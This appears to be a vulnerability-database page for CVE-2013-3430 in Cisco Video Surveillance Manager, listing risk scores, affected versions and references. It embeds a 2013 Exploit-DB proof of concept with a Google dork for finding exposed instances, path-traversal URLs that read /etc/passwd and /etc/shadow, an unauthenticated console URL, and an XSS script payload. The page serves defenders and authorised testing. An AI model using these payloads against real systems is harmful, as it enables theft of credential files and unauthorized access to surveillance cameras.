CVE-2013-3430
critical
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
10.0
Description
Cisco Video Surveillance Manager (VSM) before 7.0.0 allows remote attackers to obtain sensitive configuration, archive, and log information via unspecified vectors, related to the Cisco_VSBWT (aka Broadware sample code) package, aka Bug ID CSCsv37288.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Cisco Video Surveillance Operations Manager 6.3.2 - Multiple Vulnerabilities
# Exploit Title:Cisco Video Surveillance Operations Manager Multiple
vulnerabilities
# Google Dork: intitle:"Video Surveillance Operations Manager > Login"
# Date: 22 Feb 2013 reported to the vendor
# Exploit Author: Bassem | bassem.co
# Vendor Homepage: www.cisco.com
# Version: Version 6.3.2
# Tested on: Version 6.3.2
#1- The application is vulnerable to Local file inclusion
read_log.jsp and read_log.dep not validate the name and location of the log
file , un authenticated remote attacker can perform this
---------------------------------------------
read_log.jsp:
/usr/BWhttpd/root/htdocs/BWT/utils/logs
from /usr/BWhttpd/logs/<%= logName %>
---------------------------------------------
---------------------------------------------
read_log.dep
<%!
protected LinkedList getBwhttpdLog( String logName, String theOrder
) {
String logPath = "/usr/BWhttpd/logs/";
String theLog = logPath + logName;
LinkedList resultList = new LinkedList();
try {
BufferedReader in = new BufferedReader(new
FileReader(theLog));
String theLine = "";
while( (theLine = in.readLine()) !=
null ) {
if(
theOrder.indexOf("descending") > -1 ) {
resultList.addFirst(theLine);
} else {
resultList.addLast(theLine);
}
}
-----------------------------------------------
POC:
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
#####################################################################
#2- The application is vulnerable to local file inclusion
select and display log not validate the log file names , If attacker pass
/etc/passwd through the http post request system will display it as log
file
POC:
http://serverip/monitor/logselect.php
#####################################################################
#3 Cisco Video Surveillance Operations Manager Version 6.3.2 doesn't
perform the proper authentication for the management and view console,
Remote attacker can gain access to the system and view the attached cameras
without authentication
POC:
http://serverip/broadware.jsp
#####################################################################
#4 Application is vulnerable to XSS
The web application doesn't perform validation for the inputs/outputs for
many of its pages so its vulnerable to XSS attacks
POC: http://serverip/vsom/index.php/
"/title><script>alert("ciscoxss");</script>
--
Best Regards
BassemApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| cisco | video_surveillance_manager | {"endIncluding":"6.3.3"} | |
| cisco | video_surveillance_manager | 1.1.0 | |
| cisco | video_surveillance_manager | 1.2.1 | |
| cisco | video_surveillance_manager | 2.0.0 | |
| cisco | video_surveillance_manager | 2.1 | |
| cisco | video_surveillance_manager | 2.1.2 | |
| cisco | video_surveillance_manager | 2.1.3 | |
| cisco | video_surveillance_manager | 2.1.4 | |
| cisco | video_surveillance_manager | 2.1.6 | |
| cisco | video_surveillance_manager | 2.1.7 | |
| cisco | video_surveillance_manager | 2.3.0 | |
| cisco | video_surveillance_manager | 2.3.1 | |
| cisco | video_surveillance_manager | 4.0.1 | |
| cisco | video_surveillance_manager | 4.2.0 | |
| cisco | video_surveillance_manager | 4.2.1 | |
| cisco | video_surveillance_manager | 6.3 | |
| cisco | video_surveillance_manager | 6.3.1 | |
| cisco | video_surveillance_manager | 6.3.2 | |
References
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130724-vsm
- http://www.securityfocus.com/bid/61432
- http://www.securitytracker.com/id/1028827
- https://exchange.xforce.ibmcloud.com/vulnerabilities/85946
- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130724-vsm
- http://www.securityfocus.com/bid/61432
- http://www.securitytracker.com/id/1028827
- https://exchange.xforce.ibmcloud.com/vulnerabilities/85946
CWEs
CWE-287
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.